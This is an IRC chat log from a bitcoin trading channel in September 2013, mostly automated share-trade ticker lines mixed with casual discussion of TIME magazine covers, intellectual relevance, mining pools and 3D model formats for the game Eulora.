04:13:01 that's pretty cool Sep 16 04:13:18 i will start a share transfer to teh litecoin exchange Sep 16 04:14:01 dexX7 https://bitcointalk.org/index.php?topic=140366.msg3153774#msg3153774 is thjat you ? Sep 16 04:14:13 lol no Sep 16 04:14:15 i have no socks Sep 16 04:14:44 a ok. Sep 16 04:14:44 https://bitcointalk.org/index.php?topic=140366.msg3150117#msg3150117 Sep 16 04:14:49 [PicoStocks] 100TH/s bitcoin mine [100th] Sep 16 04:14:57 [BTCTC] [LABCOIN] 351 @ 0.00278 = 0.9758 BTC [+] Sep 16 04:15:01 other scam is hashing away except stats are low because issue except nothing was affected. Sep 16 04:15:24 if i surivive through 2014 without turning permanently sour i think i'm immune to it. Sep 16 04:15:49 [BTCTC] [ASICMINER-PT] 2 @ 2.08 = 4.16 BTC [+] Sep 16 04:16:36 like dread pirate roberts and his poison taking, you'll maybe be okay Sep 16 04:16:39 [HAVELOCK] [AM100] 50 @ 0.01907001 = 0.9535 BTC [-] Sep 16 04:16:46 [BTCTC] [DMS.MINING] 683 @ 0.002361 = 1.6126 BTC [-] Sep 16 04:16:47 [BTCTC] [DMS.MINING] 120 @ 0.002361 = 0.2833 BTC [-] Sep 16 04:16:49 [BTCTC] [DMS.MINING] 85 @ 0.002357 = 0.2003 BTC [-] Sep 16 04:16:50 [BTCTC] [DMS.MINING] 100 @ 0.002332 = 0.2332 BTC [-] Sep 16 04:16:51 [BTCTC] [DMS.MINING] 12 @ 0.00233 = 0.028 BTC [-] Sep 16 04:17:37 inb4 someone relates my system bash being inigo-montoya with dread pirate roberts and all conspiracy hell breaks loose Sep 16 04:17:39 o wait. Sep 16 04:18:50 I am Mandy Patinkin, prepare to die! Sep 16 04:19:47 http://content.time.com/time/magazine/asia/0,9263,501130916,00.html Sep 16 04:19:51 TIME Magazine -- Asia Edition -- September 16, 2013 | Vol. 182, No. 12 Sep 16 04:19:56 http://www.dailykos.com/story/2011/11/25/1039957/-STUNNING-Comparing-U-S-World-Covers-for-TIME-Magazine Sep 16 04:20:44 Daily Kos: STUNNING: Comparing U.S. & World Covers for TIME Magazine Sep 16 04:20:47 how dod u 'murica Sep 16 04:20:51 haha Sep 16 04:20:58 [BTCTC] [CIPHERMINE.B1] 1 @ 0.01039 BTC [+] Sep 16 04:20:58 PRAISE THE SOVIETS! Sep 16 04:21:09 "This is not an isolated incident, for perusing TIME's covers reveals countless examples of the publication tempting the world with critical events, ideas or figures, while dangling before Americans the chance to indulge in trite self-absorption." Sep 16 04:21:10 pay college athletes lol Sep 16 04:21:18 "the chance to indulge in trite self-absorption." Sep 16 04:21:20 wow Sep 16 04:21:21 sad Sep 16 04:21:33 Love the wording. Sep 16 04:22:00 'swat muricans do best Sep 16 04:22:35 kinda sad to have the americans completely surrender any attempt at intellectual relevance tho. Sep 16 04:22:49 i mean they never had it, but at least back when they were trying it was funnier. Sep 16 04:29:17 Define, "intellectual relevance" Sep 16 04:29:29 [HAVELOCK] [AM1] 1 @ 2.12 BTC [+] Sep 16 04:32:00 [BTCTC] [S.BBET-PT] 1 @ 0.000707 BTC [-] Sep 16 04:32:02 [BTCTC] [S.BBET-PT] 50 @ 0.0007061 = 0.0353 BTC [-] Sep 16 04:32:02 [BTCTC] [S.BBET-PT] 602 @ 0.000705 = 0.4244 BTC [-] Sep 16 04:32:58 [BTCTC] [BTC-GROWTH] 18 @ 0.1071 = 1.9278 BTC [+] Sep 16 04:33:19 [BTCTC] [DMS.SELLING] 500 @ 0.007067 = 3.5335 BTC [+] Sep 16 04:37:06 [MPEX] [S.MPOE] 7300 @ 0.00090611 = 6.6146 BTC [-] Sep 16 04:37:13 [MPEX] [S.MPOE] 3786 @ 0.00090689 = 3.4335 BTC [+] Sep 16 04:37:15 [MPEX] [S.MPOE] 6114 @ 0.00091011 = 5.5644 BTC [+] Sep 16 04:39:28 [BTCTC] [ACTIVEMINING] 5 @ 0.002734 = 0.0137 BTC [+] Sep 16 04:41:36 ;;ud intellectual Sep 16 04:41:37 http://www.urbandictionary.com/define.php?term=intellectual | Someone who has found something more interesting than sex and alcohol. Sep 16 04:41:40 Urban Dictionary: intellectual Sep 16 04:41:54 ;;nerd Sep 16 04:41:54 Error: "nerd" is not a valid command. Sep 16 04:41:57 ;;ud nerd Sep 16 04:41:58 http://www.urbandictionary.com/define.php?term=nerd | An 'individual', i.e. a person who does not conform to society's beliefs that all people should follow trends and do what their peers do. Often highly intelligent but ... Sep 16 04:41:59 Urban Dictionary: nerd Sep 16 04:42:06 ;;ud bitcoin Sep 16 04:42:06 http://www.urbandictionary.com/define.php?term=bitcoin | A crypto-currency allowing for anonymous transactions and using a decentralized architecture. Go Nanotube! Sep 16 04:42:10 Urban Dictionary: bitcoin Sep 16 04:46:43 http://blockchain.info/pools uh oh Sep 16 04:46:47 Bitcoin Hashrate Distribution - Blockchain.info Sep 16 04:47:09 [BTCTC] [BTC-TRADING-PT] 5 @ 1.01 = 5.05 BTC [+] Sep 16 04:47:20 kleeck_ relevance is the property of a construct of holding interest in a particular context. Sep 16 04:47:26 intellectual specifies what that context is. Sep 16 04:47:27 not gonna imply anything, but in case you didn't read it yet: https://bitcoil.co.il/Doublespend.pdf Sep 16 04:47:55 very old shiot neh ? Sep 16 04:48:21 in news this our, bitcoin Sep 16 04:48:24 hour* Sep 16 04:48:41 theres some miners and stuff Sep 16 04:50:11 or are we supposed to be reading something into this dexX7? Sep 16 04:51:23 i for one am kind of curious what he misunderstood/misraprehended this time to great concern. Sep 16 04:51:26 I could've assumed that was the intended meaning, but I wanted to make sure. What do you have to say about world-leading operations like Microsoft, Apple, Google, to name a few. Would the preemenance of American technology on a global scale not not indicate an "intellectual relevence"? Sep 16 04:51:31 it's a bad estimate anyway Sep 16 04:51:40 I remember when it was "oh my god Deepbit will 51%" Sep 16 04:51:45 Kleeck__ if you think microsoft is somehow intellectually relevant we have a problem. Sep 16 04:51:54 what did they do again ? Sep 16 04:51:56 Not in and of itself. Sep 16 04:51:59 then ? Sep 16 04:52:11 read my question, don't pull one aspect out. Sep 16 04:52:19 Would the preemenance of American technology on a global scale not not indicate an "intellectual relevence"? Sep 16 04:52:21 and no, technology is not the premier thing one has in mind when they discuss the intellectual. Sep 16 04:52:53 after all, the objection wasn't that the paint on the cover of times is flaking or anything of the sort. Sep 16 04:53:01 it's a beautifully printed bit of maculature. Sep 16 04:53:16 also, indians do the work for all those companies Sep 16 04:53:20 lol Sep 16 04:53:34 please to be trying again over there Sep 16 04:54:33 microsoft - makes something easy enough that even americans can use it Sep 16 04:54:50 haha Sep 16 04:54:53 apple - no wait, we need somethign even simpler, windows was too hard Sep 16 04:55:09 While technology, and the fields of study necessary to do what the American technology companies do, is not the end-all of intellectual persuits it certainl does make up a good portion. Sep 16 04:55:13 yeah, apple is basically the idea that wires are too hard. Sep 16 04:55:16 [BTCTC] [LABCOIN] 5 @ 0.002804 = 0.014 BTC [+] Sep 16 04:55:19 After all, the sciences are intellectual persuits. Sep 16 04:55:30 google - lets help americans look smart by putting all the knowledge we want teh world to have at their finger tips Sep 16 04:55:35 And many fields of science are necessary to make these companies as successful as they are. Sep 16 04:55:49 [BTCTC] [KENILWORTH] 1 @ 0.001753 BTC [+] Sep 16 04:55:53 But, dub may have a good point, in that these American companies are good at recruiting foreigners. :) Sep 16 04:55:59 Kleeck__ you'll be hard pressed arguing technology is an intellectual pursuit of such central relevance as to excuse the problems tho. Sep 16 04:56:04 (Or outsourcing) Sep 16 04:56:29 [BTCTC] [KENILWORTH] 4 @ 0.001753 = 0.007 BTC [+] Sep 16 04:56:30 I think your critique was point at the American media machine. Sep 16 04:56:44 Which is, and continues to breed, the anti-intellectual. Sep 16 04:56:53 [BTCTC] [KENILWORTH] 4 @ 0.001765 = 0.0071 BTC [+] Sep 16 04:56:57 far as anyone can tell, america's contribution to human understanding is some sort of variation of "special-subgroup-studies" Sep 16 04:57:30 no, my critique was levelled at the sad pretense at universities the american colleges are. Sep 16 04:58:57 [BTCTC] [ACTIVEMINING] 10 @ 0.002734 = 0.0273 BTC [+] Sep 16 04:58:58 anyway : the work of the intellect is to make the world intelligible. not necessarily to make it something else. to some degree it could be argued making it something else is proof of not having understood in the first place, which is why technology alone is a hard argument to bring. Sep 16 05:01:26 [BTCTC] [ACTIVEMINING] 2 @ 0.002734 = 0.0055 BTC [+] Sep 16 05:11:00 [BTCTC] [LABCOIN] 21 @ 0.002775 = 0.0583 BTC [-] Sep 16 05:11:02 [BTCTC] [LABCOIN] 21 @ 0.002775 = 0.0583 BTC [-] Sep 16 05:11:03 [BTCTC] [LABCOIN] 21 @ 0.002775 = 0.0583 BTC [-] Sep 16 05:11:04 [BTCTC] [LABCOIN] 21 @ 0.002775 = 0.0583 BTC [-] Sep 16 05:11:05 [BTCTC] [LABCOIN] 21 @ 0.002775 = 0.0583 BTC [-] Sep 16 05:11:07 [BTCTC] [LABCOIN] 21 @ 0.002774 = 0.0583 BTC [-] Sep 16 05:11:07 [BTCTC] [LABCOIN] 21 @ 0.002773 = 0.0582 BTC [-] Sep 16 05:12:20 [BTCTC] [ASICMINER-PT] 2 @ 2.063 = 4.126 BTC [-] Sep 16 05:17:02 [BTCTC] [LABCOIN] 4 @ 0.002763 = 0.0111 BTC [-] Sep 16 05:17:03 [BTCTC] [LABCOIN] 75 @ 0.00276 = 0.207 BTC [-] Sep 16 05:17:05 [BTCTC] [LABCOIN] 149 @ 0.002707 = 0.4033 BTC [-] Sep 16 05:17:06 [BTCTC] [LABCOIN] 370 @ 0.002705 = 1.0009 BTC [-] Sep 16 05:17:07 [BTCTC] [LABCOIN] 519 @ 0.002703 = 1.4029 BTC [-] Sep 16 05:17:08 [BTCTC] [LABCOIN] 481 @ 0.002702 = 1.2997 BTC [-] Sep 16 05:17:57 [BTCTC] [LABCOIN] 149 @ 0.002704 = 0.4029 BTC [+] Sep 16 05:17:58 [BTCTC] [LABCOIN] 519 @ 0.002702 = 1.4023 BTC [-] Sep 16 05:18:00 [BTCTC] [LABCOIN] 1943 @ 0.002701 = 5.248 BTC [-] Sep 16 05:18:19 [BTCTC] [LABCOIN] 132 @ 0.002703 = 0.3568 BTC [+] Sep 16 05:18:19 [BTCTC] [LABCOIN] 3057 @ 0.002701 = 8.257 BTC [-] Sep 16 05:18:46 [BTCTC] [LABCOIN] 9 @ 0.002679 = 0.0241 BTC [-] Sep 16 05:19:05 [BTCTC] [LABCOIN] 200 @ 0.002679 = 0.5358 BTC [-] Sep 16 05:19:18 [BTCTC] [LABCOIN] 100 @ 0.002676 = 0.2676 BTC [-] Sep 16 05:19:19 [BTCTC] [LABCOIN] 30 @ 0.002675 = 0.0803 BTC [-] Sep 16 05:19:21 [BTCTC] [LABCOIN] 200 @ 0.002674 = 0.5348 BTC [-] Sep 16 05:19:22 [BTCTC] [LABCOIN] 100 @ 0.002674 = 0.2674 BTC [-] Sep 16 05:19:23 [BTCTC] [LABCOIN] 9 @ 0.002657 = 0.0239 BTC [-] Sep 16 05:19:24 [BTCTC] [LABCOIN] 14 @ 0.002636 = 0.0369 BTC [-] Sep 16 05:19:25 [BTCTC] [LABCOIN] 50 @ 0.002635 = 0.1318 BTC [-] Sep 16 05:19:26 [BTCTC] [LABCOIN] 99 @ 0.002634 = 0.2608 BTC [-] Sep 16 05:19:27 [BTCTC] [LABCOIN] 171 @ 0.002613 = 0.4468 BTC [-] Sep 16 05:19:28 [BTCTC] [LABCOIN] 99 @ 0.002612 = 0.2586 BTC [-] Sep 16 05:19:29 [BTCTC] [LABCOIN] 939 @ 0.00261 = 2.4508 BTC [-] Sep 16 05:19:30 [BTCTC] [LABCOIN] 200 @ 0.002679 = 0.5358 BTC [+] Sep 16 05:21:16 [BTCTC] [LABCOIN] 167 @ 0.002678 = 0.4472 BTC [-] Sep 16 05:21:18 [BTCTC] [LABCOIN] 251 @ 0.002679 = 0.6724 BTC [+] Sep 16 05:22:08 ;;nethash Sep 16 05:22:08 990144.221368 Sep 16 05:22:16 [BTCTC] [LABCOIN] 300 @ 0.00262 = 0.786 BTC [-] Sep 16 05:26:09 [BTCTC] [LABCOIN] 66 @ 0.002748 = 0.1814 BTC [+] Sep 16 05:26:11 [BTCTC] [LABCOIN] 360 @ 0.002749 = 0.9896 BTC [+] Sep 16 05:26:12 [BTCTC] [LABCOIN] 934 @ 0.002749 = 2.5676 BTC [+] Sep 16 05:27:31 [BTCTC] [LABCOIN] 142 @ 0.00273 = 0.3877 BTC [-] Sep 16 05:29:26 Kleeck__ http://trilema.com/2013/america-and-intellectual-relevance/ there, you made it on trilema. Sep 16 05:30:39 fury is ukrainian not russian Sep 16 05:30:45 [BTCTC] [DMS.SELLING] 100 @ 0.007067 = 0.7067 BTC [+] Sep 16 05:30:58 [BTCTC] [DMS.PURCHASE] 25 @ 0.009377 = 0.2344 BTC [+] Sep 16 05:31:08 [BTCTC] [DMS.PURCHASE] 30 @ 0.009377 = 0.2813 BTC [+] Sep 16 05:31:29 [BTCTC] [DMS.SELLING] 50 @ 0.007067 = 0.3534 BTC [+] Sep 16 05:31:30 [BTCTC] [DMS.SELLING] 50 @ 0.007067 = 0.3534 BTC [+] Sep 16 05:32:43 o my bad Sep 16 05:37:02 [BTCTC] [DMS.MINING] 575 @ 0.002344 = 1.3478 BTC [+] Sep 16 05:37:04 [BTCTC] [DMS.MINING] 310 @ 0.00234 = 0.7254 BTC [-] Sep 16 05:38:28 you know you've made it when you're on trilema Sep 16 05:38:55 [BTCTC] [DMS.MINING] 2 @ 0.00233 = 0.0047 BTC [-] Sep 16 05:38:56 [BTCTC] [DMS.MINING] 5 @ 0.00232 = 0.0116 BTC [-] Sep 16 05:38:58 [BTCTC] [DMS.MINING] 575 @ 0.002304 = 1.3248 BTC [-] Sep 16 05:38:59 [BTCTC] [DMS.MINING] 37 @ 0.002303 = 0.0852 BTC [-] Sep 16 05:39:00 [BTCTC] [DMS.MINING] 250 @ 0.0023 = 0.575 BTC [-] Sep 16 05:39:24 [BTCTC] [ACTIVEMINING] 18 @ 0.002734 = 0.0492 BTC [+] Sep 16 05:41:54 [BTCTC] [ASICMINER-PT] 1 @ 2.073 BTC [+] Sep 16 05:42:13 [BTCTC] [ASICMINER-PT] 1 @ 2.073 BTC [+] Sep 16 05:43:12 all da girl dance Sep 16 05:43:16 when you're on teh T Sep 16 05:43:41 [BTCTC] [TAT.ASICMINER] 5 @ 0.0193 = 0.0965 BTC [-] Sep 16 05:43:42 [BTCTC] [TAT.ASICMINER] 79 @ 0.01918 = 1.5152 BTC [-] Sep 16 05:43:44 [BTCTC] [TAT.ASICMINER] 6 @ 0.01915 = 0.1149 BTC [-] Sep 16 05:43:45 [BTCTC] [TAT.ASICMINER] 50 @ 0.01914 = 0.957 BTC [-] Sep 16 05:43:46 [BTCTC] [TAT.ASICMINER] 42 @ 0.01904 = 0.7997 BTC [-] Sep 16 05:43:47 [BTCTC] [TAT.ASICMINER] 18 @ 0.01903 = 0.3425 BTC [-] Sep 16 05:48:10 mircea_popescu: you find any modelers yet lol Sep 16 05:48:19 still waiting on chett to release the model format guide Sep 16 05:48:51 nobody's submitted one yet afaik. Sep 16 05:49:09 what specifically are you waiting for ? Sep 16 05:50:05 model format, modeller I know submitted a goblin he's been working on, some screens Sep 16 05:50:21 just waiting for chett to give him plugins to export for the game format Sep 16 05:52:05 http://trilema.com/2013/its-called-eulora/#comment-94309 < that you mean ? Sep 16 05:52:14 It’s called Eulora pe Trilema - Un blog de Mircea Popescu. Sep 16 05:52:30 yea Sep 16 05:53:32 i'll ask. Sep 16 05:53:49 basically, the entire thing revolves around blender, which has built in support to export as what's needed (cal3d) Sep 16 05:54:01 im entirely unsure how we'll handle max imports. Sep 16 05:54:38 it's fine, the modeller has like 10 years or more experience with max Sep 16 05:54:49 been using max since 2003 or some crazy shit like that Sep 16 05:54:57 so he has a licensed copy and shit Sep 16 05:55:55 http://i.imgur.com/WO8MB6J.jpg - I think you've seen that. Sep 16 05:55:56 well i guess it's a great time to try it out, have him dump the files and we'll figure it out. Sep 16 05:56:29 kay he's still riggin the face I'll have him comment on Trilema and Chett can feed him some info as to how she wants to import the files Sep 16 05:57:07 cause, yea, he can just dump all the data to a .3DS file including animation Sep 16 05:57:38 the model itself should be straight forward to bring up I just don't know about how animation is gonna come into play Sep 16 06:00:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.01956 BTC [+] Sep 16 06:00:29 [BTCTC] [KENILWORTH] 4 @ 0.001765 = 0.0071 BTC [+] Sep 16 06:01:30 [BTCTC] [DMS.SELLING] 25 @ 0.007065 = 0.1766 BTC [-] Sep 16 06:02:13 [BTCTC] [COGNITIVE] 2 @ 0.1795 = 0.359 BTC [+] Sep 16 06:02:27 [BTCTC] [DMS.SELLING] 12 @ 0.007065 = 0.0848 BTC [-] Sep 16 06:03:07 [BTCTC] [COGNITIVE] 2 @ 0.1795 = 0.359 BTC [+] Sep 16 06:05:58 [BTCTC] [LABCOIN] 700 @ 0.00266 = 1.862 BTC [-] Sep 16 06:06:12 [BTCTC] [LABCOIN] 100 @ 0.002655 = 0.2655 BTC [-] Sep 16 06:06:35 [BTCTC] [LABCOIN] 100 @ 0.00265 = 0.265 BTC [-] Sep 16 06:07:03 [BTCTC] [LABCOIN] 861 @ 0.002635 = 2.2687 BTC [-] Sep 16 06:07:51 [BTCTC] [B.YABMC] 1 @ 0.0012 BTC [+] Sep 16 06:10:41 "OCCUPY WALL STREET and its allied movements around the country are more than a walk in the park. They are most likely the start of a new era in America." Jeffrey Sachs Sep 16 06:10:44 dude that totally worked. Sep 16 06:11:02 next time some goof with no history of accomplishment says big things i'd better pay more attention. Sep 16 06:11:14 amazing movement Sep 16 06:11:15 AMAZING COMPANY! Sep 16 06:11:22 fu assbot Sep 16 06:13:12 ya srsly, at this rate assbot is getting banned for spam Sep 16 06:14:08 http://www.youtube.com/watch?v=tieA5wfcgH4 Sep 16 06:14:10 Cami Secret Parody (Boob Apron) - YouTube Sep 16 06:17:22 [HAVELOCK] [AM100] 8 @ 0.01907 = 0.1526 BTC [-] Sep 16 06:17:25 [HAVELOCK] [AM100] 11 @ 0.01906661 = 0.2097 BTC [-] Sep 16 06:17:28 [HAVELOCK] [AM100] 64 @ 0.0190666 = 1.2203 BTC [-] Sep 16 06:17:32 [HAVELOCK] [AM100] 10 @ 0.01895 = 0.1895 BTC [-] Sep 16 06:20:53 [BTCTC] [TAT.ASICMINER] 5 @ 0.01952 = 0.0976 BTC [-] Sep 16 06:20:56 [BTCTC] [BTC-GROWTH] 29 @ 0.1071 = 3.1059 BTC [+] Sep 16 06:22:20 [BTCTC] [CIPHERMINE-PT] 1 @ 0.05995 BTC [-] Sep 16 06:24:16 [BTCTC] [DMS.PURCHASE] 51 @ 0.009001 = 0.4591 BTC [-] Sep 16 06:24:35 [BTCTC] [TAT.MINIGAME] 4 @ 0.000234 = 0.0009 BTC [+] Sep 16 06:24:36 [BTCTC] [TAT.MINIGAME] 48 @ 0.000248 = 0.0119 BTC [+] Sep 16 06:25:47 [BTCTC] [RSM] 95 @ 0.008654 = 0.8221 BTC [+] Sep 16 06:27:39 [BTCTC] [BASIC-MINING] 1 @ 0.1079 BTC [+] Sep 16 06:28:40 [BTCTC] [LABCOIN] 100 @ 0.002633 = 0.2633 BTC [-] Sep 16 06:28:41 [BTCTC] [LABCOIN] 1637 @ 0.002632 = 4.3086 BTC [-] Sep 16 06:28:42 [BTCTC] [LABCOIN] 1500 @ 0.002631 = 3.9465 BTC [-] Sep 16 06:29:31 [BTCTC] [DMS.PURCHASE] 1000 @ 0.009377 = 9.377 BTC [+] Sep 16 06:31:59 yeah, well, perhaps if dudes learned what to say to cleavage then cleavage wouldn't feel the need to abstract itself eh. Sep 16 06:39:22 [MPEX] [S.MPOE] 4189 @ 0.00091011 = 3.8125 BTC [+] Sep 16 06:39:23 [MPEX] [S.MPOE] 6211 @ 0.00091177 = 5.663 BTC [+] Sep 16 06:39:36 [HAVELOCK] [XBOND] 3 @ 0.00118999 = 0.0036 BTC [-] Sep 16 06:43:02 [BTCTC] [BASIC-MINING] 5 @ 0.108 = 0.54 BTC [+] Sep 16 06:43:03 [BTCTC] [BASIC-MINING] 5 @ 0.1081 = 0.5405 BTC [+] Sep 16 06:45:22 [BTCTC] [BASIC-MINING] 4 @ 0.1082 = 0.4328 BTC [+] Sep 16 06:45:27 [BTCTC] [BASIC-MINING] 4 @ 0.1083 = 0.4332 BTC [+] Sep 16 06:46:40 [BTCTC] [COGNITIVE] 3 @ 0.2145 = 0.6435 BTC [+] Sep 16 06:46:41 [BTCTC] [COGNITIVE] 1 @ 0.2145 BTC [+] Sep 16 06:46:43 [BTCTC] [COGNITIVE] 1 @ 0.2145 BTC [+] Sep 16 06:46:45 [BTCTC] [COGNITIVE] 3 @ 0.2145 = 0.6435 BTC [+] Sep 16 06:46:56 [BTCTC] [COGNITIVE] 5 @ 0.2145 = 1.0725 BTC [+] Sep 16 06:46:58 [BTCTC] [COGNITIVE] 3 @ 0.2145 = 0.6435 BTC [+] Sep 16 06:47:08 [BTCTC] [COGNITIVE] 2 @ 0.2145 = 0.429 BTC [+] Sep 16 06:48:40 [MPEX] [S.MPOE] 3045 @ 0.00090768 = 2.7639 BTC [-] Sep 16 07:01:58 just ignore any labcoin line - I did it from the start :) Sep 16 07:03:39 and miss the most entertaining ticker in this chan lol no way Sep 16 07:04:07 ^ Sep 16 07:04:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.0193 = 0.0386 BTC [-] Sep 16 07:15:02 [BTCTC] [DMS.MINING] 25 @ 0.002445 = 0.0611 BTC [+] Sep 16 07:15:03 [BTCTC] [DMS.MINING] 480 @ 0.002446 = 1.1741 BTC [+] Sep 16 07:15:04 [BTCTC] [DMS.MINING] 250 @ 0.00245 = 0.6125 BTC [+] Sep 16 07:15:05 [BTCTC] [DMS.MINING] 250 @ 0.00246 = 0.615 BTC [+] Sep 16 07:15:06 [BTCTC] [DMS.MINING] 250 @ 0.002475 = 0.6188 BTC [+] Sep 16 07:15:07 [BTCTC] [DMS.MINING] 250 @ 0.00248 = 0.62 BTC [+] Sep 16 07:15:08 [BTCTC] [DMS.MINING] 100 @ 0.0025 = 0.25 BTC [+] Sep 16 07:15:09 [BTCTC] [DMS.MINING] 1000 @ 0.00252 = 2.52 BTC [+] Sep 16 07:15:43 !ticker btctc LABCOIN Sep 16 07:15:45 [BTCT:LABCOIN] 1D: 0.0019 / 0.0026 / 0.003198 (389121 shares, 1011.5 BTC), 7D: 0.001501 / 0.00289 / 0.003989 (3869680 shares, 11173.5 BTC), 30D: 0.001501 / 0.00297 / 0.003989 (11419855 shares, 33899.2 BTC) Sep 16 07:15:47 lolol Sep 16 07:15:53 !last btctc labcoin Sep 16 07:15:53 Last trade for LABCOIN on BTCTC was at 0.002631 BTC [-] Sep 16 07:16:10 [BTCTC] [ASICMINER-PT] 1 @ 2.038 BTC [-] Sep 16 07:16:11 [BTCTC] [ASICMINER-PT] 4 @ 2.036 = 8.144 BTC [-] Sep 16 07:16:13 [BTCTC] [ASICMINER-PT] 4 @ 2.036 = 8.144 BTC [-] Sep 16 07:16:14 [BTCTC] [ASICMINER-PT] 35 @ 2.035 = 71.225 BTC [-] Sep 16 07:16:15 [BTCTC] [ASICMINER-PT] 2 @ 2.029 = 4.058 BTC [-] Sep 16 07:17:55 [BTCTC] [ASICMINER-PT] 1 @ 2.028 BTC [-] Sep 16 07:17:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.0192 = 0.0384 BTC [-] Sep 16 07:17:58 [BTCTC] [ASICMINER-PT] 1 @ 2.028 BTC [-] Sep 16 07:17:59 [BTCTC] [TAT.ASICMINER] 25 @ 0.0192 = 0.48 BTC [-] Sep 16 07:18:00 [BTCTC] [TAT.ASICMINER] 10 @ 0.01915 = 0.1915 BTC [-] Sep 16 07:18:02 [BTCTC] [TAT.ASICMINER] 37 @ 0.01906 = 0.7052 BTC [-] Sep 16 07:18:03 [BTCTC] [TAT.ASICMINER] 24 @ 0.01903 = 0.4567 BTC [-] Sep 16 07:18:04 [BTCTC] [TAT.ASICMINER] 13 @ 0.019 = 0.247 BTC [-] Sep 16 07:18:05 [BTCTC] [TAT.ASICMINER] 4 @ 0.01884 = 0.0754 BTC [-] Sep 16 07:18:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.0188 BTC [-] Sep 16 07:18:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.0187 BTC [-] Sep 16 07:18:08 [MPEX] [S.MPOE] 9039 @ 0.00091177 = 8.2415 BTC [+] Sep 16 07:18:22 [MPEX] [S.MPOE] 7861 @ 0.00091473 = 7.1907 BTC [+] Sep 16 07:20:22 [BTCTC] [ASICMINER-PT] 2 @ 2.028 = 4.056 BTC [-] Sep 16 07:20:24 [BTCTC] [ASICMINER-PT] 3 @ 2.027 = 6.081 BTC [-] Sep 16 07:21:52 [BTCTC] [DMS.PURCHASE] 10 @ 0.009375 = 0.0938 BTC [-] Sep 16 07:22:18 [BTCTC] [DMS.PURCHASE] 289 @ 0.009377 = 2.71 BTC [+] Sep 16 07:23:23 [BTCTC] [DMS.MINING] 1 @ 0.00253 BTC [+] Sep 16 07:43:39 [BTCTC] [LABCOIN] 15 @ 0.002703 = 0.0405 BTC [+] Sep 16 07:43:49 [MPEX] [S.MPOE] 7989 @ 0.00091473 = 7.3078 BTC [+] Sep 16 07:53:31 [BTCTC] [LABCOIN] 1077 @ 0.002703 = 2.9111 BTC [+] Sep 16 07:53:32 [BTCTC] [TAT.ASICMINER] 37 @ 0.01921 = 0.7108 BTC [+] Sep 16 07:54:16 http://www.theguardian.com/lifeandstyle/wordofmouth/2013/sep/13/civet-coffee-cut-the-crap Sep 16 07:54:20 now that is trolling Sep 16 07:54:20 Civet coffee: why it's time to cut the crap | Life and style | theguardian.com Sep 16 07:59:00 [BTCTC] [DMS.MINING] 38 @ 0.002399 = 0.0912 BTC [-] Sep 16 07:59:02 [BTCTC] [DMS.MINING] 468 @ 0.00239 = 1.1185 BTC [-] Sep 16 07:59:03 [BTCTC] [DMS.MINING] 103 @ 0.002386 = 0.2458 BTC [-] Sep 16 07:59:04 [BTCTC] [DMS.MINING] 100 @ 0.002375 = 0.2375 BTC [-] Sep 16 07:59:06 [BTCTC] [DMS.MINING] 495 @ 0.002305 = 1.141 BTC [-] Sep 16 07:59:07 [BTCTC] [DMS.MINING] 100 @ 0.002301 = 0.2301 BTC [-] Sep 16 07:59:08 [BTCTC] [DMS.MINING] 300 @ 0.0023 = 0.69 BTC [-] Sep 16 08:02:36 damn, thats fucked up Sep 16 08:03:55 [BTCTC] [LABCOIN] 107 @ 0.002651 = 0.2837 BTC [-] Sep 16 08:03:57 [BTCTC] [LABCOIN] 1072 @ 0.00265 = 2.8408 BTC [-] Sep 16 08:03:58 [BTCTC] [LABCOIN] 177 @ 0.002625 = 0.4646 BTC [-] Sep 16 08:03:58 [BTCTC] [LABCOIN] 1000 @ 0.002624 = 2.624 BTC [-] Sep 16 08:04:00 [BTCTC] [LABCOIN] 800 @ 0.002623 = 2.0984 BTC [-] Sep 16 08:04:01 [BTCTC] [LABCOIN] 30 @ 0.002623 = 0.0787 BTC [-] Sep 16 08:04:02 [BTCTC] [LABCOIN] 100 @ 0.002622 = 0.2622 BTC [-] Sep 16 08:04:03 [BTCTC] [LABCOIN] 200 @ 0.00262 = 0.524 BTC [-] Sep 16 08:04:04 [BTCTC] [LABCOIN] 20 @ 0.002615 = 0.0523 BTC [-] Sep 16 08:04:05 [BTCTC] [LABCOIN] 200 @ 0.002614 = 0.5228 BTC [-] Sep 16 08:04:06 [BTCTC] [LABCOIN] 100 @ 0.002606 = 0.2606 BTC [-] Sep 16 08:04:08 [BTCTC] [LABCOIN] 1000 @ 0.002605 = 2.605 BTC [-] Sep 16 08:04:09 [BTCTC] [LABCOIN] 990 @ 0.002603 = 2.577 BTC [-] Sep 16 08:04:09 [BTCTC] [LABCOIN] 165 @ 0.002603 = 0.4295 BTC [-] Sep 16 08:04:10 [BTCTC] [LABCOIN] 1566 @ 0.002603 = 4.0763 BTC [-] Sep 16 08:04:11 [BTCTC] [LABCOIN] 200 @ 0.002602 = 0.5204 BTC [-] Sep 16 08:04:12 [BTCTC] [LABCOIN] 2000 @ 0.002602 = 5.204 BTC [-] Sep 16 08:04:13 [BTCTC] [LABCOIN] 2550 @ 0.002602 = 6.6351 BTC [-] Sep 16 08:04:14 [BTCTC] [LABCOIN] 352 @ 0.002601 = 0.9156 BTC [-] Sep 16 08:05:30 [BTCTC] [LABCOIN] 1648 @ 0.002601 = 4.2864 BTC [-] Sep 16 08:05:31 [BTCTC] [LABCOIN] 10000 @ 0.002601 = 26.01 BTC [-] Sep 16 08:05:33 [BTCTC] [LABCOIN] 3352 @ 0.0026 = 8.7152 BTC [-] Sep 16 08:09:08 [BTCTC] [LABCOIN] 2439 @ 0.0026 = 6.3414 BTC [-] Sep 16 08:09:51 [BTCTC] [ASICMINER-PT] 1 @ 2.079 BTC [+] Sep 16 08:09:53 [BTCTC] [ASICMINER-PT] 1 @ 2.08 BTC [+] Sep 16 08:09:53 [BTCTC] [ASICMINER-PT] 2 @ 2.089 = 4.178 BTC [+] Sep 16 08:09:54 [BTCTC] [ASICMINER-PT] 2 @ 2.09 = 4.18 BTC [+] Sep 16 08:09:55 [BTCTC] [ASICMINER-PT] 5 @ 2.094 = 10.47 BTC [+] Sep 16 08:09:56 [BTCTC] [ASICMINER-PT] 5 @ 2.095 = 10.475 BTC [+] Sep 16 08:10:04 [BTCTC] [ASICMINER-PT] 2 @ 2.1 = 4.2 BTC [+] Sep 16 08:10:26 [BTCTC] [LTC-ATF.B2] 1 @ 0.0106 BTC [-] Sep 16 08:10:27 [BTCTC] 